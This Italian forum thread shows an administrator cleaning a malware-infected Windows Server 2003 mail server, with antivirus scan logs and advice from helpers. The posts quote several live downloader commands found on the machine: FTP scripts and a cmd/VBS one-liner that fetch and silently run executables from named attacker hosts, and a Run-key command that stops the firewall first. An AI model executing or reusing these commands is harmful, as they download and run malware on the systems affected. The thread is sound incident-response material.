Ciao,

non ho idea da dove siano arrivati, ma ho un server di posta exchange 2003 in piedi dal 2003 appunto... e solo da 1 mese a questa parte ho un bel casino con virus o acari vari...

è incredibile..


http://s14.postimage.org/8a6xdsv4h/virusss.png

http://s17.postimage.org/66c8u3qzj/virussss.jpg

http://s16.postimage.org/m0n1x5rhh/virusss3.png

credo di aver debellato un pò di roba a forza di tentativi con vari antivirus e tools tipo autoruns o procexp.. ma mi rimane sempre il dubbio che ci sia ancora qualcosa di nascosto..

purtroppo essendo un server di produzione mi viene difficile spianarlo e reinstallare tutto.

cosa ne pensate?


si sono fatti uno script che crea utenti farlocchi sulla macchina, tenta di installarsi su sql e imposta tutta una serie di sessione remote pronte per essere accedute...
l'antivirus trend micro nemmeno se ne accorge.. anche perchè probabilmente non si tratta esattamente di virus.
Ha cancellato qualcosa stinger.exe ... ma altro non so che dire.

all'interno di un file su c:\xp123.exe
...e così ce ne sono a decine sparsi un pò dappertutto.. pieni di roba varia..

open 115.239.226.140
123
123
get 123.exe c:\boot123.exe
bye

segui la semplice procedura descritta in Guida alla Disinfezione per Infetti (http://www.hwupgrade.it/forum/showthread.php?t=1599737) e pubblica tutti i log richiesti facendo attenzione alle Regole di Sezione, così potremmo aiutarti :)

grazie,

sto passando step by step...


però scusami... questo non lo capisco.. ho impostato l'antivirus trendmicro che ELIMINI qualsiasi forma di virus, malware vero o presunto.. eppure.. guarda cosa scrive: IGNORATO.. :mad: :mad: :confused:

http://s15.postimage.org/aw2opntff/virusss4.jpg

si ogni tanto lo fa.. non commento per auto censura :O

si ogni tanto lo fa.. non commento per auto censura :O

non commenti trend? :D

spybotanddestroy non ha trovato nulla.. tutto pulito.

in compenso, nello stesso momento, trend fa questo:

http://s14.postimage.org/9980bjjhd/virusss5.jpg

http://postimage.org/image/pk847uvz1/

ho comprato la licenza 1y di PREVX.... cancellato qualcosina ma niente di che..

tanti altri dettagli:

guardate lo sporcaccione! :mad:

http://s14.postimage.org/tidrg9ewd/vairuz.jpg (http://postimage.org/image/tidrg9ewd/)



ma che caspita! perchè quel FTP finto sta sotto a SQLSERV.EXE ??? :muro:

prova quelli che ti ho consigliato che ti rilascieranno un'ottima radiografia del sistema.. se però non ti va fa' nulla ma sarà senz'altro più ardua

sto facendo...

intanto lascio qualche altra info, non si sa mai..

"C:\WINDOWS\system32\cmd.exe" /c "@echo off&echo Set psp = CreateObject("Msxml2.XMLHTTP") >>c:\361.vbs&echo set ws=WScript.CreateObject("WScript.Shell") >>c:\361.vbs&echo psp.Open "GET","http://jindan962464.3322.org/office_se.exe",0 >>c:\361.vbs&echo psp.Send() >>c:\361.vbs&echo Set aGet = CreateObject("ADODB.Stream") >>c:\361.vbs&echo aGet.Mode = 3 >>c:\361.vbs&echo aGet.Type = 1 >>c:\361.vbs&echo aGet.Open() >>c:\361.vbs&echo aGet.Write(psp.responseBody) >>c:\361.vbs&echo aGet.SaveToFile "c:\soffice_se.exe",2 >>c:\361.vbs&echo wscript.sleep 8000 >>c:\361.vbs&echo ws.Run "c:\soffice_se.exe",0 >>c:\361.vbs&c:\361.vbs"

iniziamo...

AFT-Cleaner - fatto!

Malwarebytes Anti-Malware - fatto!
Malwarebytes Anti-Malware 1.61.0.1400
www.malwarebytes.org

Versione database: v2012.04.17.04

Windows Server 2003 Service Pack 2 x86 NTFS
Internet Explorer 8.0.6001.18702
Administrator :: MAIL [amministratore]

17/04/2012 17.16.57
mbam-log-2012-04-17 (17-16-57).txt

Tipo di scansione: Scansione veloce
Opzioni di scansione attive: Memoria | Esecuzione automatica | Registro | File system | Euristica/Extra | Euristica/Shuriken | PUP | PUM
Opzioni di scansione disattivate: P2P
Elementi esaminati: 251857
Tempo impiegato: 24 minuti, 38 secondi

Processi rilevati in memoria: 0
(non sono stati rilevati elementi nocivi)

Moduli di memoria rilevati: 0
(non sono stati rilevati elementi nocivi)

Chiavi di registro rilevate: 1
HKLM\SYSTEM\CurrentControlSet\SERVICES\DSLservereil (Trojan.Agent) -> Spostato in quarantena ed eliminato con successo.

Valori di registro rilevati: 0
(non sono stati rilevati elementi nocivi)

Voci rilevate nei dati di registro: 1
HKLM\SYSTEM\CurrentControlSet\Services\RemoteAccess\RouterManagers\Ip|DLLPath (Hijack.Iprouter) -> Cattivo: (C:\483700.dll) Buono: (%SystemRoot%\System32\iprtrmgr.dll) -> Spostato in quarantena e riparato con successo.

Cartelle rilevate: 0
(non sono stati rilevati elementi nocivi)

File rilevati: 4
C:\RECYCLER\bootsvchost.exe (Trojan.Agent) -> Spostato in quarantena ed eliminato con successo.
C:\RECYCLER\xpServer.exe (Trojan.Agent) -> Spostato in quarantena ed eliminato con successo.
C:\RECYCLER\xpsvchost.exe (Trojan.Agent) -> Spostato in quarantena ed eliminato con successo.
C:\RECYCLER\zysvchost.exe (Trojan.Agent) -> Spostato in quarantena ed eliminato con successo.

(fine)



Emsisoft Anti-Malware - fatto!


Emsisoft Anti-Malware - Versione 6.0
Ultimo aggiornamento: 23/04/2012 16.34.28

Impostazioni scansione:

Tipo scansione: Completa
Oggetti: Rootkit, Memoria, Tracce, C:\, E:\
Archivio scansioni: On
Scansione ADS: On

Scansione avviata: 23/04/2012 16.38.53

C:\bootserver.exe rilevati: Backdoor.Win32.Zegost!E2
C:\xpsys.exe rilevati: Trojan-Downloader.BAT.Small!E2
C:\WINDOWS\XXXXXXB3AD5E66\svchsot.exe rilevati: Trojan-Dialer!E2
C:\WINDOWS\system32\boot3.exe rilevati: Trojan-Proxy.Win32.Small.DT!E2
C:\WINDOWS\system32\bootserver.exe rilevati: Backdoor.Win32.Zegost!E2
C:\WINDOWS\system32\on1.exe rilevati: Trojan-Dialer!E2
C:\WINDOWS\system32\onexplorer.exe rilevati: Backdoor.Win32.Zegost!E2
C:\WINDOWS\system32\st3.exe rilevati: Trojan-Proxy.Win32.Small.DT!E2
C:\WINDOWS\system32\st1.exe rilevati: Trojan-Dialer!E2
C:\WINDOWS\system32\xpsvchost.exe rilevati: Win32.SuspectCrc!E2
C:\RECYCLER\onfQQmusic.dat rilevati: Trojan-Downloader.BAT.Small!E2
C:\RECYCLER\onfMicrosoft.dat rilevati: Trojan-Downloader.BAT.Small!E2
C:\RECYCLER\onfserver.dat rilevati: Trojan-Downloader.BAT.Small!E2
C:\RECYCLER\onfexplorer.dat rilevati: Trojan-Downloader.BAT.Small!E2
C:\RECYCLER\onfservies.dat rilevati: Trojan-Downloader.BAT.Small!E2
C:\RECYCLER\st1.exe rilevati: Trojan-Dialer!E2
C:\RECYCLER\onfsvchost.dat rilevati: Trojan-Downloader.BAT.Small!E2
C:\RECYCLER\xpoffice_se.exe rilevati: Trojan-Downloader.BAT.Small!E2
C:\RECYCLER\xpsvchost.exe rilevati: Trojan-Downloader.BAT.Small!E2
C:\RECYCLER\xpserver.exe rilevati: Trojan-Downloader.BAT.Small!E2
C:\RECYCLER\zyserver.exe rilevati: Trojan-Downloader.BAT.Small!E2
C:\RECYCLER\zyoffice_se.exe rilevati: Trojan-Downloader.BAT.Small!E2
C:\RECYCLER\zysvchost.exe rilevati: Trojan-Downloader.BAT.Small!E2
C:\RECYCLER\bootserver.exe rilevati: Backdoor.Win32.Zegost!E2
C:\RECYCLER\xpwindows.exe rilevati: Trojan-Downloader.BAT.Small!E2
C:\Documents and Settings\onexplorer.exe rilevati: Backdoor.Win32.Zegost!E2
C:\Documents and Settings\st1.exe rilevati: Trojan-Dialer!E2
C:\Documents and Settings\on1.exe rilevati: Trojan-Dialer!E2
C:\Documents and Settings\onf1.dat rilevati: Trojan-Downloader.BAT.Small!E2
C:\Documents and Settings\All Users\Dati applicazioni\PrevxCSI\qc.csi rilevati: Exploit.Win32.ShellCode!E2
E:\Temp\crash sistema\driverview\DriverView.exe rilevati: Riskware.PSWTool.Win32.WinPassViewer.ah!E1
E:\SQL_Web_Pubblication\ftp\update.exe rilevati: Backdoor.Win32.Bifrose!E2

Scansionati 566658
Rilevato 32

Fine scansione: 23/04/2012 17.42.04
Tempo scansione: 1:03:11

E:\SQL_Web_Pubblication\ftp\update.exe In quarantena Backdoor.Win32.Bifrose!E2
E:\Temp\crash sistema\driverview\DriverView.exe In quarantena Riskware.PSWTool.Win32.WinPassViewer.ah!E1
C:\Documents and Settings\All Users\Dati applicazioni\PrevxCSI\qc.csi In quarantena Exploit.Win32.ShellCode!E2
C:\WINDOWS\system32\xpsvchost.exe In quarantena Win32.SuspectCrc!E2
C:\WINDOWS\system32\boot3.exe In quarantena Trojan-Proxy.Win32.Small.DT!E2
C:\WINDOWS\system32\st3.exe In quarantena Trojan-Proxy.Win32.Small.DT!E2
C:\WINDOWS\XXXXXXB3AD5E66\svchsot.exe In quarantena Trojan-Dialer!E2
C:\WINDOWS\system32\on1.exe In quarantena Trojan-Dialer!E2
C:\WINDOWS\system32\st1.exe In quarantena Trojan-Dialer!E2
C:\RECYCLER\st1.exe In quarantena Trojan-Dialer!E2
C:\Documents and Settings\st1.exe In quarantena Trojan-Dialer!E2
C:\Documents and Settings\on1.exe In quarantena Trojan-Dialer!E2
C:\xpsys.exe In quarantena Trojan-Downloader.BAT.Small!E2
C:\RECYCLER\onfQQmusic.dat In quarantena Trojan-Downloader.BAT.Small!E2
C:\RECYCLER\onfMicrosoft.dat In quarantena Trojan-Downloader.BAT.Small!E2
C:\RECYCLER\onfserver.dat In quarantena Trojan-Downloader.BAT.Small!E2
C:\RECYCLER\onfexplorer.dat In quarantena Trojan-Downloader.BAT.Small!E2
C:\RECYCLER\onfservies.dat In quarantena Trojan-Downloader.BAT.Small!E2
C:\RECYCLER\onfsvchost.dat In quarantena Trojan-Downloader.BAT.Small!E2
C:\RECYCLER\xpoffice_se.exe In quarantena Trojan-Downloader.BAT.Small!E2
C:\RECYCLER\xpsvchost.exe In quarantena Trojan-Downloader.BAT.Small!E2
C:\RECYCLER\xpserver.exe In quarantena Trojan-Downloader.BAT.Small!E2
C:\RECYCLER\zyserver.exe In quarantena Trojan-Downloader.BAT.Small!E2
C:\RECYCLER\zyoffice_se.exe In quarantena Trojan-Downloader.BAT.Small!E2
C:\RECYCLER\zysvchost.exe In quarantena Trojan-Downloader.BAT.Small!E2
C:\RECYCLER\xpwindows.exe In quarantena Trojan-Downloader.BAT.Small!E2
C:\Documents and Settings\onf1.dat In quarantena Trojan-Downloader.BAT.Small!E2
C:\bootserver.exe In quarantena Backdoor.Win32.Zegost!E2
C:\WINDOWS\system32\bootserver.exe In quarantena Backdoor.Win32.Zegost!E2
C:\WINDOWS\system32\onexplorer.exe In quarantena Backdoor.Win32.Zegost!E2
C:\RECYCLER\bootserver.exe In quarantena Backdoor.Win32.Zegost!E2
C:\Documents and Settings\onexplorer.exe In quarantena Backdoor.Win32.Zegost!E2

In quarantena 32

F-Secure OnLine - NON fatto... mi pianta la macchina

prova kaspersky tool o eset online :)

ok @xcdegasp , inizio!

intanto oggi sono tornato in ufficio e ho questo bel spettacolo

http://s13.postimage.org/b8jguv5nn/vairuz2.jpg (http://postimage.org/image/b8jguv5nn/)

kaspersky tool, non ha trovato nulla... per lui è tutto pulito...

eset online, NON si attiva il tasto START, quando accetto i termini d'uso..
errore sulla pagina con explorer. Il sito è inserito tra quelli attendibili.

prosegui con la guida vediamo che succede

ok,

Dr.Web.... niente, non ha trovato nulla

http://s18.postimage.org/cvj8tj3k5/drweb.jpg (http://postimage.org/image/cvj8tj3k5/)

adesso faccio partire F-secure online scanner...

ecco qui il rapporto:

Rapporto scansione
venerdì, aprile 27, 2012 12:17:40 - 12:56:59
Nome computer: MAIL
Tipo di scansione Analizza sistema per la ricerca di malware, spyware e rootkit
Destinazione: C:\ E:\


--------------------------------------------------------------------------------

9 malware rilevati
Generic.Botget.B93ACC52 (spyware)
Sistema (Disinfettati)
Generic.Botget.03095D3F (spyware)
Sistema (Disinfettati)
Generic.Botget.04E532F6 (spyware)
Sistema (Disinfettati)
Generic.Botget.C1DB5363 (spyware)
Sistema (Disinfettati)
Generic.Botget.B93ACC52 (virus)
C:\XPSVCHOST.EXE (Non rimossi)
Generic.Botget.04E532F6 (virus)
C:\ZYSVCHOST.EXE (Non rimossi)
Generic.Botget.C1DB5363 (virus)
C:\WINDOWS\SYSTEM32\XPSVCHOST.EXE (Non rimossi)
Generic.Botget.03095D3F (virus)
C:\WINDOWS\SYSTEM32\ZYSVCHOST.EXE (Non rimossi)
Generic.Botget.2EFE938F (virus)
C:\DOCUMENTS AND SETTINGS\ZYSVCHOST.EXE (Rinominati & Inviati)

--------------------------------------------------------------------------------

Statistiche
Analizzati:
File: 54656
Sistema: 3844
Non analizzati: 7
Azioni:
Disinfettati: 4
Rinominati: 1
Eliminati: 0
Non rimossi: 4
Inviati: 1
File non analizzati:
C:\PAGEFILE.SYS
C:\WINDOWS\SYSTEM32\CONFIG\DEFAULT
C:\WINDOWS\SYSTEM32\CONFIG\SAM
C:\WINDOWS\SYSTEM32\CONFIG\SECURITY
C:\WINDOWS\SYSTEM32\CONFIG\SOFTWARE
C:\WINDOWS\SYSTEM32\CONFIG\SYSTEM
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR.ICP.IT\IMPOSTAZIONI LOCALI\TEMP\2\HSPERFDATA_ADMINISTRATOR\3676

questi tre file:
C:\WINDOWS\SYSTEM32\XPSVCHOST.EXE
C:\WINDOWS\SYSTEM32\ZYSVCHOST.EXE
C:\DOCUMENTS AND SETTINGS\ZYSVCHOST.EXE
riesci a farli scansionare su http://www.threatexpert.com/filescan.aspx ?
basta registrarsi gratuitamente e a fine analisi ti manderanno alla casella email, che hai usato in fase di registrazione, il link al risultato dell'analisi. ti chiedo poi di pubblicare questo link così posso vedere anche io :)

nel frattempo prova a proseguire con lo step successivo

ok, provo quel servizio online

nel frattempo, aspettando ho rifatto un altra passata con malwarebytes

Malwarebytes Anti-Malware 1.61.0.1400
www.malwarebytes.org

Versione database: v2012.04.27.03

Windows Server 2003 Service Pack 2 x86 NTFS
Internet Explorer 8.0.6001.18702
Administrator :: MAIL [amministratore]

27/04/2012 1:40:23
mbam-log-2012-04-27 (13-40-23).txt

Tipo di scansione: Scansione veloce
Opzioni di scansione attive: Memoria | Esecuzione automatica | Registro | File system | Euristica/Extra | Euristica/Shuriken | PUP | PUM
Opzioni di scansione disattivate: P2P
Elementi esaminati: 255354
Tempo impiegato: 14 minuti, 11 secondi

Processi rilevati in memoria: 0
(non sono stati rilevati elementi nocivi)

Moduli di memoria rilevati: 0
(non sono stati rilevati elementi nocivi)

Chiavi di registro rilevate: 1
HKLM\SYSTEM\CurrentControlSet\SERVICES\Rspdates Apxplicatioan (Trojan.Service) -> Spostato in quarantena ed eliminato con successo.

Valori di registro rilevati: 0
(non sono stati rilevati elementi nocivi)

Voci rilevate nei dati di registro: 0
(non sono stati rilevati elementi nocivi)

Cartelle rilevate: 0
(non sono stati rilevati elementi nocivi)

File rilevati: 3
C:\RECYCLER\onserver.exe (Trojan.Agent) -> Spostato in quarantena ed eliminato con successo.
C:\RECYCLER\stserver.exe (Trojan.Agent) -> Spostato in quarantena ed eliminato con successo.
C:\RECYCLER\zyj.exe (Trojan.Agent) -> Verrà eliminato al riavvio.

(fine)

questi tre file:
C:\WINDOWS\SYSTEM32\XPSVCHOST.EXE
C:\WINDOWS\SYSTEM32\ZYSVCHOST.EXE
C:\DOCUMENTS AND SETTINGS\ZYSVCHOST.EXE
riesci a farli scansionare su http://www.threatexpert.com/filescan.aspx ?
basta registrarsi gratuitamente e a fine analisi ti manderanno alla casella email, che hai usato in fase di registrazione, il link al risultato dell'analisi. ti chiedo poi di pubblicare questo link così posso vedere anche io :)

nel frattempo prova a proseguire con lo step successivo

mi scrive:

The submitted file is not detected.

prova a zipparli e inviarli zippati (senza criptarli) :)

oppure prova anche a mandarli a quelli della kaspersky (attraverso questo form http://support.kaspersky.com/virlab/helpdesk.html ) oppure a quelli di clamav
(http://cgi.clamav.net/sendvirus.cgi) che in genere si occupa di rispedirlo ai vari produttori.
Altrimenti c'è sempre il servizio del buon vecchio eraser
http://www.pcalsicuro.com/malware/upload.php

quel sito continua a non volerne sapere...

Ho spedito su quello di kasperksy.

ad ogni modo, non è un virus, perchè ho editato con notepad il file e all'interno c'erano queste istruzioni:

open sishenxiaonan.8866.org
nange
123a
get svchost.exe bootsvchost.exe
bye

ma erano tre exe quindi oggetti compilati.. che file hai aperto con notepad?

ma erano tre exe quindi oggetti compilati.. che file hai aperto con notepad?

proprio quell'exe: C:\WINDOWS\SYSTEM32\XPSVCHOST.EXE

sono tutti finti... dimensione 1KByte

ho dato una passata con hitmanpro... e qualcosa ha fatto fuori..

ma non è bastato.. ora ho dato una passata con SOPHOS il removal malware gratuito...

http://s7.postimage.org/8qzj9wbsn/virusssdss.jpg (http://postimage.org/image/8qzj9wbsn/)

speriamo bene.

bene.. sembra che siamo arrivati ad un punto...

il trojan si chiama: troj/downbat-a

e pare.... che solo SOPHOS lo capisca!

il problema è che NON lo cancella. tramite il tool gratuito. :rolleyes:

ma lo vede in c:\recycler\.. , le chiavi di registro invece puoi controllarle manualmente..

ma se facevi sysinspector forse potevi avere un maggiore aiuto, non rimuove nulla ma sicuramente ti aiuta per individuare servizi estranei/modificati, file e chiavi di registro

ma lo vede in c:\recycler\.. , le chiavi di registro invece puoi controllarle manualmente..

ma se facevi sysinspector forse potevi avere un maggiore aiuto, non rimuove nulla ma sicuramente ti aiuta per individuare servizi estranei/modificati, file e chiavi di registro

ok, ho passato di nuovo con sysinspector , e spulciato chiavi e files uno per uno...

rinominati e cancellati.. ora vediamo cosa succede

per ora sembra pulito, vediamo cosa succede in giornata..


qui ho trovato un sacco di roba strana, cercando "recycler" nel registro:

http://s11.postimage.org/49bpg8cin/robastrana.jpg (http://postimage.org/image/49bpg8cin/)

qualcuna non si vede più. l'ho cancellata.

toccandosi.. sembra vada ancora meglio, un ulteriore step.

http://s13.postimage.org/696qi55ub/cleanmaybe.jpg (http://postimage.org/image/696qi55ub/)

come non detto!


http://s13.postimage.org/onluzv7ir/ftpmaledetto.jpg (http://postimage.org/image/onluzv7ir/)

niente da fare... è tornato un gran macello..

E in più, novità del giorno... ho dovuto spegnere togliendo la corrente al server. Alla riaccensione windows mi ha chiesto di essere RIATTIVATO!!!
è terribile.



sto provando a cancellare due voci nuove sul registro... HKLM...Run

ma mi dice: Errore durante l'eliminazione dei valori, impossibile eliminare tutti i valori specificati...

in particolare c'è una chiave shell con scritto:

c:\windows\system32\cmd.exe /c net1 stop sharedaccess&mode con cols=13 lines=1&echo open attack.5166.info > cmd.txt&echo sql>> cmd.txt&echo sql>> cmd.txt&echo binary >> cmd.txt&echo get cn.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&cn.e

un giretto con rootkitreveal

http://s15.postimage.org/cebzd9cs7/continua.jpg (http://postimage.org/image/cebzd9cs7/)

piccolo passo avanti... ho bloccato qualsiasi trasmissione ftp dal firewall, almeno così non si scarica nulla..

ho analizzato lo script che fa partire cmd.exe, collegandomi al loro ftp server


ftp> open 58.221.61.175
Connected to 58.221.61.175.
220 Welcome to LZL's FTP Server V3.9.3
Name (58.221.61.175:utente): ftp
331 Password required for ftp
Password:
230 Client :ftp successfully logged in. Client IP :80.116.105.235
Remote system type is WINDOWS.
ftp> ls
227 Entering Passive Mode (58,221,61,175,4,0).
150 Opening ASCII mode data connection for directory list.
04-14-12 06:34PM 40466 sys.exe
04-24-12 10:13PM 37436 sys.zip
226 Transfer complete.
ftp>

e provato qualche comando:

ftp> rename sys.exe testadicaz.zo.dat
550 Permission denied.
ftp> get sys.exe
local: sys.exe remote: sys.exe
227 Entering Passive Mode (58,221,61,175,4,0).
150 Opening BINARY mode data connection for file transfer.
100% |***********************************| 40466 18.83 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 174 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
40466 bytes received in 00:02 (18.82 KiB/s)